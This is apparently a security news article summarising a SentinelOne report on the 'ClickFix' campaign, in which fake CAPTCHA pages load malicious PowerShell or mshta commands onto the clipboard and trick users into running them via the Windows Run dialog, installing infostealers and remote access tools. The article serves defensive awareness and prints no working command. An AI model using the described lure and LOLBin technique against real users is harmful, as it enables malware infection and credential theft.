Ddos 
Example infection chain from CAPTCHA to Lumma Stealer | Image: SentinelOne
Threat actors have ramped up a new social engineering campaign, dubbed “ClickFix,” where fake CAPTCHA prompts embedded in compromised or cloned websites trick users into launching malware via clipboard injection and Windows Run dialog abuse.
In a recent report, SentinelOne reveals how this deceptive technique has evolved over the past year, combining user fatigue with clever use of legitimate Windows tools to execute malicious payloads like Lumma Stealer and NetSupport RAT.
“Victims are socially-engineered into solving a malicious challenge, leading to the execution of PowerShell code followed by additional payloads,” the researchers explain.
The attack starts with a seemingly harmless CAPTCHA prompt that users encounter on a compromised website, fake login portal, phishing email, or even social media link. Victims are guided through a sequence that feels familiar—verify you’re human, solve a puzzle—but ends with something far more sinister.
“Victims are required to solve the CAPTCHA… then paste hidden content from the clipboard into the Windows ‘Run’ dialog,” the report states.
The embedded script copies a malicious PowerShell or mshta command to the clipboard. Once pasted into the Run dialog and executed, it contacts a command-and-control server to download malware.
ClickFix relies heavily on trusted system binaries—Living Off the Land Binaries (LOLBins)—to bypass traditional defenses. Attackers typically use tools such as:
- PowerShell – For executing encoded payloads.
- mshta.exe – To load malicious HTA content.
- certutil.exe – To decode or download binaries.
“Certutil.exe is also frequently used in combination with PowerShell commands or scripts,” SentinelOne noted.
ClickFix campaigns are linked to several notorious malware families:
- Lumma Stealer – An infostealer targeting browser data, credentials, and cryptocurrency wallets.
- NetSupport RAT – A legitimate remote admin tool abused for full system access.
- SectopRAT – A stealthy remote access tool capable of launching a hidden second desktop for browser manipulation.
“The most frequently observed [payloads] have resulted in the download and launch of various infostealer trojans and remote access tools,” the report states.
What sets ClickFix apart is its simplicity. There’s no zero-day exploit, no hidden iframe—just a convincing fake CAPTCHA and a user willing to paste a command into Windows.
“ClickFix relies on user fatigue with anti-spam mechanisms,” SentinelOne warns. “Tricking victims into infecting themselves in this manner has proven highly effective.”
Donate